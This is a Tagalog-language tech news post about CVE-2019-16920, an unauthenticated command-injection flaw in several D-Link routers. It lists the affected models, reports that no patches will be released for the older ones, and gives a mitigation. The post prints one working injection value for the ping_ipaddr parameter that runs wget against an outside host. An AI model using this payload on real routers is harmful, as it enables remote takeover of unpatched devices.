ProHoster > Blog > balita sa internet > Malayo na mapagsamantalang kahinaan sa mga D-Link router

Malayo na mapagsamantalang kahinaan sa mga D-Link router

Sa mga wireless router ng D-Link nakilala mapanganib na kahinaan (CVE-2019–16920), na nagbibigay-daan sa iyong malayuang magsagawa ng code sa gilid ng device sa pamamagitan ng pagpapadala ng espesyal na kahilingan sa handler ng "ping_test", na maa-access nang walang pagpapatunay.

Kapansin-pansin, ayon sa mga developer ng firmware, ang "ping_test" na tawag ay dapat na isagawa lamang pagkatapos ng pagpapatunay, ngunit sa katotohanan ito ay tinatawag sa anumang kaso, anuman ang pag-log in sa web interface. Sa partikular, kapag ina-access ang application_sec.cgi script at ipinapasa ang parameter na "action=ping_test", ang script ay nagre-redirect sa pahina ng pagpapatunay, ngunit sa parehong oras ay nagsasagawa ng pagkilos na nauugnay sa ping_test. Upang maisagawa ang code, ginamit ang isa pang kahinaan sa ping_test mismo, na tumatawag sa ping utility nang hindi maayos na sinusuri ang kawastuhan ng IP address na ipinadala para sa pagsubok. Halimbawa, upang tawagan ang wget utility at ilipat ang mga resulta ng command na "echo 1234" sa isang panlabas na host, tukuyin lamang ang parameter na "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".

Malayo na mapagsamantalang kahinaan sa mga D-Link router

Ang pagkakaroon ng kahinaan ay opisyal na nakumpirma sa mga sumusunod na modelo:

  • DIR-655 na may firmware na 3.02b05 o mas matanda;
  • DIR-866L na may firmware na 1.03b04 o mas matanda;
  • DIR-1565 na may firmware na 1.01 o mas matanda;
  • DIR-652 (walang impormasyon tungkol sa mga may problemang bersyon ng firmware na ibinigay)

Ang panahon ng suporta para sa mga modelong ito ay nag-expire na, kaya ang D-Link siya nakasaad, na hindi maglalabas ng mga update para maalis nila ang kahinaan, hindi inirerekomenda ang paggamit sa mga ito at nagpapayo na palitan ang mga ito ng mga bagong device. Bilang solusyon sa seguridad, maaari mong limitahan ang pag-access sa web interface sa mga pinagkakatiwalaang IP address lamang.

Sa kalaunan ay natuklasan na ang kahinaan ay din nakakaapekto mga modelong DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 at DIR-825, mga plano para sa pagpapalabas ng mga update na hindi pa nalalaman.

Pinagmulan: opennet.ru

Magdagdag ng komento